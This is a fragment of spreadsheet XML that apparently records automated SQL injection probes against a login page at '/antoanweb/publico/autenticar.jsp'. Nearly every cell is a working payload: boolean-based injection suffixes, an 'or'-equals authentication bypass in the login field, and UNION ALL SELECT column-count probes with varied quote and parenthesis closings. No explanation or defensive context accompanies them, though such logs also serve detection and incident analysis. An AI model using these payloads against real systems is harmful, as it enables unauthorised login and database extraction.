r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#and('rrkh'='rrkh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#and('vljn'='vljn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#and('tzhn'='tzhn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#and('owyz'='owyz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#and(('bocb'='bocb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#and(('biiw'='biiw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#and(('lqmw'='lqmw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#and(('cahg'='cahg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#and(('hexn'='hexn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#and(('jeqc'='jeqc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#and(('dgkh'='dgkh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#and(('yxwu'='yxwu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#and(('jlte'='jlte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#and(('hxnu'='hxnu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#and((('aeja'='aeja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#and((('xfsw'='xfsw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#and((('mkgz'='mkgz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#and((('wsjo'='wsjo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#and((('lrwy'='lrwy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#and((('dybk'='dybk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#and((('gtgb'='gtgb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#and((('thmx'='thmx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#and((('hgok'='hgok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#and((('dnfr'='dnfr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#and'smtg'='smtg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#and'ygia'='ygia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#and'ztqt'='ztqt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#and'unhk'='unhk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#and'zkrv'='zkrv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#and'sfmq'='sfmq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#and'tjdc'='tjdc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#and'zfzh'='zfzh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#and'xexe'='xexe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#and'bdnb'='bdnb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#and('txtl'like'txtl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#and('zvre'like'zvre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#and('wmes'like'wmes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#and('iqrh'like'iqrh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#and('udwb'like'udwb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#and('voaw'like'voaw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#and('dyfh'like'dyfh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#and('xonv'like'xonv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#and('iobu'like'iobu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#and('bzhf'like'bzhf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#and(('plvu'like'plvu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#and(('ajww'like'ajww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#and(('prlj'like'prlj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#and(('vzed'like'vzed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#and(('nsjj'like'nsjj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#and(('yjyv'like'yjyv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#and(('uaob'like'uaob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#and(('lzrs'like'lzrs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#and(('rkzi'like'rkzi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#and(('tvot'like'tvot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#and((('ctsc'like'ctsc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#and((('aepu'like'aepu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#and((('kbli'like'kbli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#and((('mvqx'like'mvqx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#and((('fkmo'like'fkmo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#and((('lohy'like'lohy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#and((('evdw'like'evdw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#and((('vyeb'like'vyeb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#and((('btxg'like'btxg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#and((('nvnx'like'nvnx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#and'nfhw'like'nfhw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#and'eugc'like'eugc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#and'mzas'like'mzas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#and'pzfk'like'pzfk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#and'apca'like'apca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#and'wrxu'like'wrxu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#and'hecm'like'hecm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#and'evxb'like'evxb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#and'kfpl'like'kfpl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#and'tqbd'like'tqbd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#and("vaqt"="vaqt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#and("mldq"="mldq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#and("dnqv"="dnqv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#and("haji"="haji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#and("sbah"="sbah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#and("fxib"="fxib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#and("ilop"="ilop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#and("amzg"="amzg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#and("anuo"="anuo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#and("qsxb"="qsxb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#and(("lsxt"="lsxt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#and(("hate"="hate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#and(("arhp"="arhp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#and(("nkge"="nkge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#and(("gdjp"="gdjp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#and(("vgqx"="vgqx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#and(("onxj"="onxj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#and(("ffqb"="ffqb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#and(("fgbn"="fgbn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#and(("bgbv"="bgbv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#and((("yqdj"="yqdj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#and((("mbtv"="mbtv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#and((("awfj"="awfj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#and((("klld"="klld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#and((("dmkb"="dmkb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#and((("qpyv"="qpyv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#and((("nsyq"="nsyq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#and((("sqqq"="sqqq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#and((("zkyr"="zkyr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#and((("gzkv"="gzkv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#and"vimz"="vimz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#and"xvjo"="xvjo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#and"jxcj"="jxcj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#and"atrh"="atrh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#and"csfn"="csfn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#and"vykl"="vykl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#and"basm"="basm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#and"bpil"="bpil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#and"lubc"="lubc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#and"obai"="obai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#and("usfh"like"usfh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#and("wtia"like"wtia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#and("serg"like"serg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#and("amyd"like"amyd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#and("mtap"like"mtap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#and("uabp"like"uabp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#and("gsnx"like"gsnx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#and("yukc"like"yukc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#and("nytw"like"nytw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#and("rwog"like"rwog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#and(("yjss"like"yjss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#and(("zfbi"like"zfbi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#and(("iqlp"like"iqlp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#and(("jjwb"like"jjwb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#and(("bhdb"like"bhdb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#and(("czce"like"czce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#and(("eboc"like"eboc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#and(("zvhr"like"zvhr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#and(("vscb"like"vscb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#and(("smnr"like"smnr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#and((("tzih"like"tzih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#and((("ljpl"like"ljpl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#and((("vvxn"like"vvxn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#and((("cmtb"like"cmtb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#and((("dnxc"like"dnxc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#and((("fdbj"like"fdbj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#and((("seep"like"seep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#and((("jvjy"like"jvjy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#and((("unvd"like"unvd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#and((("iwlp"like"iwlp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#and"uxfx"like"uxfx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#and"tdfr"like"tdfr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#and"gxwf"like"gxwf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#and"fdlr"like"fdlr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#and"bnms"like"bnms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#and"byxp"like"byxp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#and"jckt"like"jckt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#and"zugs"like"zugs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#and"vjye"like"vjye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#and"ortr"like"ortr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049,1049#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546,5546#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534,3534#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583,1583#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074,3074#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468,9468#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370,6370#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276,7276#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523,8523#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546,1546#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879,7879#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850,1850#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987,1987#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340,340#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976,976#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871,6871#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640,7640#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947,2947#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989,7989#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277,6277#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411,7411#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972,972#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900,2900#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214,3214#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697,5697#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552,3552#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513,3513#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288,6288#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725,6725#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324,7324#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655,9655#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154,3154#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504,3504#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974,2974#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776,7776#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591,4591#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687,7687#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382,6382#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832,3832#and(6898=6898</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580,8580#and(919=919</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962,7962#and(5301=5301</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440,2440#and(7350=7350</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222,9222#and(1599=1599</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033,8033#and(9523=9523</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182,1182#and(6478=6478</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883,9883#and(767=767</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873#and(6040=6040</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552,2552#and(1456=1456</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297,1297#and((8875=8875</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677,2677#and((7077=7077</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300,7300#and((890=890</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173,7173#and((1677=1677</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653,1653#and((4309=4309</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884,1884#and((6384=6384</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794,4794#and((2417=2417</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678,3678#and((6932=6932</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983,1983#and((1200=1200</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685,8685#and((7782=7782</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467,1467#and(((3028=3028</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881,9881#and(((6204=6204</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811,6811#and(((9899=9899</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203,7203#and(((6430=6430</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562,1562#and(((9461=9461</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470,2470#and(((206=206</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443,9443#and(((2589=2589</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579,5579#and(((8815=8815</t>
  </si>
